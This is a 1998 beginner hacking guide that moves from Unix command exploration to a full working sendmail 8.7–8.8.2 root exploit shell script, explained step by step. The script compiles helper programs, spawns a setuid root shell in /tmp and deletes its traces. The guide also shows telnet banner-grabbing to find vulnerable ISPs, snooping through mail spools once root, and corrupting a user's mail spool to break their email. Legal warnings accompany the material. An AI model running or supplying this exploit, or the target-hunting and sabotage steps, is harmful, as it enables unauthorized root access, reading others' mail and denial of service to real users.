| 05/16/98 Guide to (mostly) Harmless Hacking Vol. 5 Programmers' Series No. 2: Shell Programming: an Exploit Explained, part 2 by Carolyn Meinel <cpm@rt66.com> and BOFH <blips@cryptotek.happyhacker.org> (finger us for important security tips!) HOW TO DISCOVER ALL AVAILABLE UNIX COMMANDS Now that you have a login file that isn't lame, let's start exploring the commands you can run from your tcsh shell account. Since you are reading this because you wish to be a hacker, let's start by looking for a compiler for the C language, the most important language for exploits to break into computers. The best guess for a command to run the C compiler is the letter "C" (duh.) So at your prompt give the command: c<control d> where you first type the letter "c", then hold down the "control" key while hitting the letter "d". (Note: this will also work with the C shell (csh) but not with any other shells.) This gives us a complete list of all the commands you can use that start with the letter "c". It will look something like this: c++ chroot compress.FCS c2ph chrtbl config cal chsh config.txt calctool ci constype calendar clear continue cancel clear_colormap convert_to_Xdefaults capitalize clear_functions convert_to_xview case click convertfont cat clock core cb cm cpio cc cm_delete cppstdin (many more commands beginning with the letter c snipped) That "cc" command looks promising. It is possible that on your system the C compiler will have a different name, most commonly "gcc" (the gnu compiler). So don't give up if you don't see "cc". To be sure this is the C compiler, next you give the command "man cc". This brings up an online manual on the C compiler: CC(1V) USER COMMANDS CC(1V) NAME cc - C compiler SYNOPSIS cc [ -a ] [ -align _block ] [ -Bbinding ] [ -c ] [ -C ] [ -dalign ] [ -dryrun ] [ -Dname [=def ] ] [ -E ] [ float_option ] [ -fsingle ] [ -g ] [ -go ] [ -help ] [ -Ipathname ] [ -J ] [ -Ldirectory ] [ -M ] [ -misalign ] [ -o outputfile ] [ -O[level] ] [ -p ] [ -P ] [ -pg ] [ -pic ] [ -PIC ] [ -pipe ] [ -Qoption prog opt ] [ -Qpath pathname ] [ -Qproduce sourcetype ] [ -R ] [ -S ] [ -sb ] [ -target target_arch ] [ -temp=directory ] [ -time ] [ -Uname ] [ -w ] sourcefile ... [ -llibrary ] SYSTEM V SYNOPSIS /usr/5bin/cc arguments /usr/xpg2bin/cc arguments Note: arguments to /usr/5bin/cc and /usr/xpg2bin/cc are identical to those listed above. (snip) DESCRIPTION cc is the C compiler. It translates programs written in the C programming language into executable load modules, or into relocatable binary programs for subsequent loading with the ld(1) link editor. In addition to the many options, cc accepts several types of filename arguments. For instance, files with names ending in .c are taken to be C source programs. They are compiled, and each resulting object program is placed in the current directory. The object file is named after its source file - the suffix .o replacing .c in the name of the object. In the same way, files whose names end with .s are taken to be assembly source programs. They are assembled, and produce .o files. Filenames ending in .il are taken to be inline expansion code template files; these are used to expand enabled. See FILES, below for a complete list of compiler-related filename suffixes. Other arguments refer to assembler or loader options, object programs, or object libraries. Unless -c, -S, -E -P or -Q produce is specified, these programs and libraries, together with the results of any specified compilations or assemblies, are loaded (in the order given) to produce an output file named a.out. You can specify a name for the executable by using the -o option. "Oh, no!" you shout/cry/whimper. "This stuff looks like it was written by a gnome in some underground weapons complex in a James Bond movie!" Patience, one of these days I'll get around to writing a simple explanation of how to link, compile and run C programs. If you don't have patience, a good book that covers C and includes a CD-ROM with programming tools is "Unix Programming Tools," by Eric Foster-Johnson, M&T Books, 1997. Or, if you are a real hacker, you will start trying out that C compiler today! Guess what, if you make mistakes in trying to follow the on-line manual, big deal. No one will make fun of you. You can't destroy your computer with a C compiler mistake, either. (OK, maybe you could mess something up, but what the heck.) Real hackers aren't afraid to make mistakes and don't make fun of others who make mistakes, either. The essence of hacking is to boldly try out new things and not be afraid of hitting the wrong key. Besides, I make lots and LOTS of mistakes and I [Carolyn] am a famous, er, infamous hacker. If an old lady like me isn't afraid to make public boo-boos, you can be brave and figure out that C compiler by yourself. To learn about every single command that you have the power to run from your shell account, type in the letter "a" followed by control d. Then with each and every command that brings up, give the command "man acommand" where you substitute the command you wish to explore for "acommand". Then try using that command until you have figured out how to use it with all its variations. Do this in turn with each of the rest of the letters of the alphabet. When you are done, you will be a true Unix wizard. No one will ever again say to you, "RTFM!" (Read the forking manual). AN EXPLOIT EXPLAINED Here's a fun, simple, powerful shell script. This is a goodie that you might be able to use from your shell account to create a root shell for yourself on the computer where you have your shell. Newbie note: A "root shell" allows you to do anything you wish to the computer you are on. You can go to jail warning: In the US and many other countries, it is illegal even to just get a root shell on someone else's computer -- unless that person agrees to let you get root. If you are determined to test this shell script, there are ways to do this legally. Number one, install some form of Unix on your home computer. The easiest to install is Red Hat Linux, available at http://www.redhat.com. The easiest to get exploits to run on is Debian Linux, at http://www.debian.org. For other Linux sources, see the GTMHH "Linux!" at http://www.happyhacker.org. Make sure your Linux is running an outdated sendmail program, versions 8.7 through 8.8.2. Next set up user accounts on your home Linux box. The command is "adduser." Then run this exploit from your user account on your home computer. If you have the right version of sendmail, you will be amazed at how easy it is to break in. The other way to legally run this exploit is to get permission to break into someone else's computer. Soon our Hacker Wargame will offer accounts on a newbie computer that will allow this exploit. Don't assume you can get away with running this script against a stranger's computer. There is no way to be absolutely certain you won't get caught. Besides, if you have to read this to learn how to break into a computer, you don't know enough to have even a hope of getting away with the crime. Once you try this exploit you will know how ridiculously easy it is to break into computers. If someone gets busted for breaking into a computer using this shell script, yeah, sure, the media will make out like the person who ran it is a genius. But you are about to learn that a little kid could break into a computer that runs a vulnerable version of sendmail. It's that easy. So anyone who is in the know realizes that it doesn't take brains to break into a computer. They will simply agree with Fatal Error that "To err is human; to get caught is just plain stupid." Here is how to break into a computer that runs sendmail 8.7 through 8.8.2 on the Linux and FreeBSD operating systems. 1) Look for an Internet service provider running a vulnerable version of sendmail. To do this, get the domain names of some ISPs from http://www.celestin.com/pocia. Another way to get ISP names is from people's email addresses. Then try telnetting into their smtp (mail server) ports. Use the command: telnet fubar.com smtp Trying 208.999.37.180... Connected to fubar.com (208.999.37.180). Escape character is '^]'. 220 lobo.net ESMTP Now there is a smart ISP. They don't tell strangers what mail server program they run. But pretty soon you will hit an ISP that is vulnerable. You will get a message like this: telnet foominds.com smtp Trying 209.999.14.99... Connected to foominds.com (209.999.14.99). Escape character is '^]'. 220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700 OK, we have a vulnerable version of sendmail. But does it also have a vulnerable operating system? You can find that out by telneting into the login: telnet foominds.com Trying 209.999.14.99... Connected to foominds.com (209.999.14.99). Escape character is '^]'. UNIX(r) System V Release 4.0 (zuni) login: We struck out here -- maybe. This exploit is guaranteed to work for Linux and FreeBSD running vulnerable versions of sendmail. It may or may not work on this ISP. Let's say you find an ISP where this exploit is certain to work. Your next step is to buy an account on this ISP. You can go to jail warning: The way I am showing you to break into a computer is GUARANTEED to get you caught. Don't do this unless you have first gotten permission to try it out from the owner of your ISP. If you discover your ISP is vulnerable, your best bet is not to break in. Instead, politely tell tech support they are vulnerable, and offer to show them how to break in. They might say "Yes, please show us how it's done"! Then it will be OK to run this script. Now comes the fun part. Give the command "pico s.sh" (or substitute your favorite editor for "pico". That brings up an editor program. Next, put in the following shell commands: # # # Hi ! # This is exploit for sendmail smtpd bug # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). # This shell script does a root shell in /tmp directory. # If you have any problems with it, drop me a letter. # Have fun ! # # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su # # # echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd echo "Now type: /tmp/sh" Now save it as s.sh. The "sh" at the end of the name tells you it is a shell script. After saving it, be sure to make it executable by giving the command "chmod 700 s.sh". That means only you (or someone in your shell account) can run this program. If you want anyone to be able to run it, give the command "chmod 777". What does this cute little shell script do? It writes C programming language commands into two files, "leshka.c" and "smtpd.c", puts them in the right directories on your computer, compiles them, makes them executable, runs them, then erases them, then prompts the user to enter his or her brand new Unix shell, "/tmp/sh", inside of which the user will discover he or she is root (the superuser with control over the entire victim computer). Let's take this program apart so we understand how it does its thing. 1) It writes two c programs. For example, the file leshka.c is written with the shell commands: echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c 2) Next the script compiles both c programs: cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c Note that you must know the command to run the C compiler on that computer. If the C compiler command is "gcc", then substitute "gcc" for "cc" in this line of the shell script. You also must know the path to sendmail. Check it with the command "whereis sendmail". If it has a different path than "/usr/sbin/sendmail," you must substitute the correct path. 3) Next this shell script runs shell commands to run the exploit: kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` 4) It takes an instant to erase the evidence: rm leshka.c leshka smtpd.c /tmp/smtpd 5) Then it sends a message to the screen: echo "Now type: /tmp/sh" That reminds you to give the command /tmp/sh to get into your own private root shell. You have to do this quickly because this exploit only lets you get into a root shell for a short time. You can get punched in the nose warning: When you are root it is really easy to mess things up. Even if you have permission to be root, be careful! If a friend gave you permission to break into his computer, just think how he will feel if he has to reinstall his operating system because you hit a wrong key or two! This is a good reason not to break into a stranger's computer. You may think you are quietly, harmlessly sneaking around, when, boom, you accidentally trash things. HOW TO EXPLORE A COMPUTER FROM INSIDE A SHELL ACCOUNT What else can we do that is fun? You can do a thorough exploration of everything that you are allowed to access from your account with just four commands: "pwd", "cd", "ls" and "cat". Sound too good to be true? I'll prove to you it's really this easy, now! Special bonus: if you just got root with that shell script above, you now can totally explore your victim computer! HOW TO READ EMAIL DIRECTLY FROM THE MAIL SPOOL How about a nerdy Unix way to read your incoming email? (If you are root you can read everyone's email this way. In the US, your ISP has the legal right to read your email -- another reason to be friends, and not enemies, of the tech support staff!) This is a real blast from the past, an example of what life was like before email, when us old folks used to have to send each other messages by simply transferring files. First, let's find out where we are right now. For that you use the "pwd" command. Your results may vary with this command, but if you give this command right after logging in you will see your user name as part of the current directory. Now it's time to start moving around. Let's try out these commands to get into the email directory. On most Unix systems you can do this with the command: ->cd /var/spool/mail If that doesn't work, try: ->cd /var/mail Now -- can you resist? Since you are in /var/spool/mail, with the command "ls" you can find out the user names of everyone who gets email here. If you really wish to snoop, give the command ls -alF (or on some systems "ls -alK") and you can even find out if anyone has world-readable email. Newbie note: How do you figure out if someone's email is world readable? "ls -alF /var/spool/mail/myusername" (substituting your user name for "myusername") will give something that looks like this: -rw------- 1 cpm 31217 May 3 16:14 /var/spool/mail/cpm That's my mail. But if you see something like this: -rw----r-- 1 cpm 31217 May 3 16:14 /var/spool/mail/cpm That means anyone can read it. And if you see this: -rw----rw- 1 cpm 31217 May 3 16:14 /var/spool/mail/cpm That means anyone could alter my incoming email! Here's an obnoxious trick. If someone were to put the wrong stuff in someone's mail spool, it would disable their email reading programs so they couldn't get their email until it got fixed. For example, my email programs can be disabled by bringing the file /var/spool/mail/cpm up in an editor program, putting the words "This is a test" at the top of the file, and saving it. If your mail spool should get messed up someday so that your email program can't read it, you can straighten it out easily. Just give the command "pico /var/spool/mail/myusername" (or whatever the path turns out to be for your mail spool). Then use the editor to first read and save any email you want, then delete everything in that file! Leave it empty! That will get rid of whatever the messed up stuff was. If you can handle a problem like this by yourself, tech support will be thankful that you don't call them crying about every little thing. So let's suppose you use the "ls -alF" (or "ls -alK") command on the entire mail spool at your ISP. If you do find that someone's email can be read by anyone in the world, you need to make a decision. Do you want to make friends and increase the likelihood that you will be able to get a great job someday at your ISP? Then don't snoop! You can win points with tech support if you point out the problem politely. Make friends way: Email tech support with the message, "I was checking file permissions on my email and noticed that user name JoeBlow has world-readable mail." Make enemies and get kicked off your ISP way: Email the victim user with the message "You are owned!!! Muhahaha!!!" LIBRARY FUNCTIONS Next let's use this ability to explore to do some more preparatory work for your big day when you begin running C exploit programs. That exploit by Leshka is unusually easy because it is a simple shell script. Most exploit programs must be run as compiled C programs, and most of these, to save disk space, rely on calling lots of library functions. So you need to find what kinds of library programs are on your computer. If any of the functions called by your latest exploit program are missing, you need to find them and get them compiled where you can access them from your account. (If the tech support staff at your ISP is convinced you are a good guy, they might even let you store your library functions in a public part of the system. This keeps you from having to pay for extra file space in your account.) Newbie note: A "library function" is not a party held in a library. It is a program that performs a commonly used task. Most C programs that exploit security flaws to gain access to a computer include many library functions. You need to get all the library functions of an exploit available to you on your computer in order for it to work. Math obsessives and Fortran users please note that many C functions are not a "function" as you are used to it being defined. To see what library functions are on the computer you are using, first give the command: ls /usr/local/lib If you are lucky you will see something like this: aliaas.csh* libcom_err.a libmmalloc.a path.csh* alias.csh* libcrypto.a libopcodes.a perl/ bison.hairy libdb.a libpty.a perl5/ bison.simple libdes425.a libreadline.a pgp/ (snip) Anything with an asterisk after it is executable (you are using tcsh shell, aren't you?) If it ends with the extension ".a", that means it is a C library function. Where else might we find programs that can be included in programs you wish to run? Let's try: /usr/openwin/lib /usr/local/X11/lib /usr/X11/lib There are other places where you might find good programs that are more than just C library functions. Of course you will try "whereis games"! Here are some other examples of directories with programs and library functions you may be able to run: ->ls /usr/bin c++rt0.o libftpio_p.a libopie.a compat libg++.a libopie.so.2.0 crt0.o libg++.so.4.0 libopie_p.a gcrt0.o libg++_p.a libpcap.a kzhead.o libgcc.a libpcap.so.2.2 (snip) Anything with the extension "o" is an object module compiled from a C program. Also, try /usr/local/bin: Pnews* pager* Rnmail* patch* WebReport* patch-metamail* a2p* perl* (snip) You can go on and on like this hunting for interesting stuff. If you know the name of the program you are looking for, you can use the "whereis" (and in some shells, "find"). Otherwise, try searching directories for stuff you are allowed to run. The commands "cd .." and "cd /" are great for moving upward into unknown directory space, and "ls" for moving down. Whenever you wonder where you are, give the command "pwd". CONCLUSION Today's exercises will help you: * get familiar with the computer where you have a shell account * show you how easy programming can be * reveal that breaking into computers is something even a little kid could do To become a truly elite hacker, you need to be able to do far more than merely break into computers. In fact, the hacker gods (people like Eric Raymond, who is profiled in one of our Guides to (mostly) Harmless Hacking) laugh at people who say they are hackers just because they can break into computers. Remember, no one needs to understand Leshka's exploit to use it. After doing today's lessons, you are already more advanced than many of the "hackers" who break into computers. This is because you understand some basics of how Leshka's shell script works, and have even written your own login shell script. So now you are already ahead of the average guy who calls himself a "hacker." You don't believe me? At last year's Def Con V convention, a real hacker ran a poll of people who claimed to be hackers. Over half had never even heard of the "cat" command. You not only have heard of it -- you use it all the time now. Right? Happy hacking! Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn P. Meinel <cmeinel@techbroker.com> and BOFH. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. Carolyn Meinel M/B Research -- The Technology Brokers http://techbroker.com |